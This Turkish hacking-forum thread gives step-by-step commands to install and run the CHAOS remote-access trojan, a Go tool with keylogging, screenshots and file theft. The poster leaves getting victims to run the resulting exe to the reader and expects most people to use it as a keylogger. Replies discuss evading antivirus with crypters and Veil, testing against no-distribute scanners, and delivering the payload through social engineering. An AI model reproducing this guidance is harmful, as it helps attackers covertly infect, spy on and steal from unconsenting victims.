Linux İle Bilgisayara Sızma |Daha Kolay| ~C@ginreis

caginreis

Uzman üye
26 Ara 2015
1,205
7
!
ÖZELLİKLERİ :
Kod:
Dosyayı indir
* Dosya yükleme
* Ekran görüntüsü 
* Keylogger 
* URL'yi Uzaktan Aç
* İşletim Sistemi Adı Al
* Bomba Çalıştır
---------------------
ÖNCELİKLE İHTİYACIMIZ OLAN PROGRAMLARI KURMAK İÇİN KODUMUZ:
Kod:
$ apt install golang xterm git upx-ucl -y
YAZIYORUZ VE KURUYORUZ...
----------------------
PROGRAMI İNDİRELİM :
Kod:
$ git clone https://github.com/tiagorlampert/CHAOS.git
YÜKLEME YAPARKEN SİZE EKRAN GÖRÜNTÜSÜ GEREKSİNİMİ İÇİN YÜKLEME YAPMANIZ GEREKECEK ŞU KODLARI YAZIYORSUNUZ :
Kod:
$ go get github.com/kbinani/screenshot && go get github.com/lxn/win
$ go install github.com/kbinani/screenshot && go install github.com/lxn/wi

-------------------------
YÜKLEME YAPTIK AÇIYORUZ KOMUT:
Kod:
$ cd CHAOS
----------------------
Kod:
$ go run CHAOS.go

DEVAMI İSE ŞÖYLEDİR:
Ll3GP0.gif

EXE DOSYASINI YUTTURMAK SİZE KALMIŞ
:)
EMEĞİ GÖRMEMEZLİK YAPMAYALIM.

SONUÇ:
r59y8z.png

Son düzenleme:

Daedalus

Üye
11 Tem 2015
216
0
Yararlı konu teşekkürler :) windowsun bu exe'yi virüs olarak görmemisi için ne gibi tavsiyeler verebilirsiniz ?

cewl

Kıdemli Üye
3 Haz 2017
2,870
9
29
Merdekan
merhaba konuya bakan arkadaslar eyer sen soyleyenleri yapmaya baslarlarsa go parametresinde hata alir konuya

apt update && apt install golang

yazmayni tavsiyye ederim canim benim ellerine saliq guzel konu olms

caginreis

Uzman üye
26 Ara 2015
1,205
7
!
Yararlı konu teşekkürler :) windowsun bu exe'yi virüs olarak görmemisi için ne gibi tavsiyeler verebilirsiniz ?

Bunu böyle yapınca virüs olarak çoğu görmüyor program yinede crypter yapmak isterseniz yapın ama bunda gerek yok okadar

merhaba konuya bakan arkadaslar eyer sen soyleyenleri yapmaya baslarlarsa go parametresinde hata alir konuya

apt update && apt install golang

yazmayni tavsiyye ederim canim benim ellerine saliq guzel konu olms
Aynen bu daha olumlu sonuç verir tesekkurler

Moderatör tarafında düzenlendi:

Lawliet123

Kıdemli Üye
31 Tem 2016
2,558
6
Ortada Linux Sisteme sızma gibi bir şey yok.

Linux üzerinden bir Trojan oluşturup, sosyal mühendislik aracılığıyla yedirmek var. Bu zaten bir standart, bir kolaylığı yok.

Ayrıca external network'ler için IP sabitlemeyi dahi göstermemişsin.
Konunun tamamı programı nasıl indireceğimizden ibaret.

Emek var, ama geliştirilmeli :)

caginreis

Uzman üye
26 Ara 2015
1,205
7
!
Ortada Linux Sisteme sızma gibi bir şey yok.

Linux üzerinden bir Trojan oluşturup, sosyal mühendislik aracılığıyla yedirmek var. Bu zaten bir standart, bir kolaylığı yok.

Ayrıca external network'ler için IP sabitlemeyi dahi göstermemişsin.
Konunun tamamı programı nasıl indireceğimizden ibaret.

Emek var, ama geliştirilmeli :)

Linux kullanan kişiler zaten devamını yapabilecekleri şeyler ki sistem kurulum en önemli noktadır zaten tahminen çogu kişi keylogger olarak kullanacak bu özellikte bu kadar için yeterli. Teşekkürler. Ben linux sisteme sızma demedim siz yanlış anladınız linux ile yapıldığını belirttim

Lawliet123

Kıdemli Üye
31 Tem 2016
2,558
6
Linux kullanan kişiler zaten devamını yapabilecekleri şeyler ki sistem kurulum en önemli noktadır zaten tahminen çogu kişi keylogger olarak kullanacak bu özellikte bu kadar için yeterli. Teşekkürler. Ben linux sisteme sızma demedim siz yanlış anladınız linux ile yapıldığını belirttim

Başlığı değiştirmişsiiiin :)
Çakal seni :D

Neyse, dediğim gibi, emek var.
Ama daha güzel konular bekliyoruz, Benim ana işletim sistemin linux bu arada, ParrotSec OS kullanıyorum.

caginreis

Uzman üye
26 Ara 2015
1,205
7
!
Başlığı değiştirmişsiiiin :)
Çakal seni :D

Neyse, dediğim gibi, emek var.
Ama daha güzel konular bekliyoruz, Benim ana işletim sistemin linux bu arada, ParrotSec OS kullanıyorum.
Yanlış anlaşılma olunca değiştirmek zorunda kaldım mecbur :)
Konu Kullanması Bilenler İçin Gayet güzel bir konu diye düşünüyorum .. teşekkür ler

Castiel

Yeni üye
1 Ocak 2019
45
0
Elinize emeginize saglik, evet antiviruslere yakanlanmamak icin bir kac operasyon yapmak lazim veil bu konuda oldukca basarili ve sonrasinda da nodistribute sitelerinden kontrol etmek lazim guncel antivirus databaselerinden.Sonrasi sosyal muhendislik nasil yedirirseniz :)

Aborjina

Yeni üye
1 Ara 2018
5
0
parrotsec güvenli değil demişlerdi kendisi bir rat dediler biz kali de kaldık ondan bir haber gelmedi diye
nedir onun son durumu

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.